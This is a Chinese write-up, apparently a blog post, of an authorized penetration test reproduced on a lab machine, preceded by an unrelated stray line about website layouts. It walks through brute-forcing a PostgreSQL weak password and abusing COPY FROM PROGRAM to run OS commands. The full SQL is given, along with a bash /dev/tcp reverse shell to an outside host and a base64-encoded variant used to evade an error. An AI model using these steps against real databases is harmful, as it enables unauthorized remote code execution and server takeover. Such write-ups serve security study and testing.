三栏式布局的网站有哪些系统开发的需求分析阶段的重要工作之一是

记一次授权攻击通过PostgreSql弱口令拿到服务器权限的事件。

使用靶机复现攻击过程。

过程

在信息收集过程中，获取到在公网服务器上开启了5432端口，尝试进行暴破，获取到数据库名为默认postgres，密码为1

随后连接进PostgreSql

已知从9.3版本开始，postgresql新增copy to/from program功能，允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

利用条件：

• 超级用户权限
• 版本9.3-11.2

默认数据库postgres已经是超级用户权限，然后需要确认数据库版本

查看PostgreSql版本

以上两个条件均具备，说明该漏洞可以利用

执行命令,获取用户id及群组id

-- 先删除你想要使用但是已经存在的表

DROP TABLE IF EXISTS cmd_exec;

-- 创建保存系统命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

-- 执行系统命令利用特定函数

COPY cmd_exec FROM PROGRAM 'id';

-- 查看执行结果

SELECT * FROM cmd_exec;

命令可以正常执行,随后执行反弹shell命令尝试获取交互shell

控制端使用nc开启监听

在数据库中执行如下命令

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1';

SELECT * FROM cmd_exec;

在实战中使用上述命令可以正常反弹shell,但是在靶场中执行会产生报错信息ERROR: program "/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1" failed

DETAIL: child process exited with exit code 2

尝试对反弹shell命令进行编码

echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash';

SELECT * FROM cmd_exec;

执行后成功获取到shell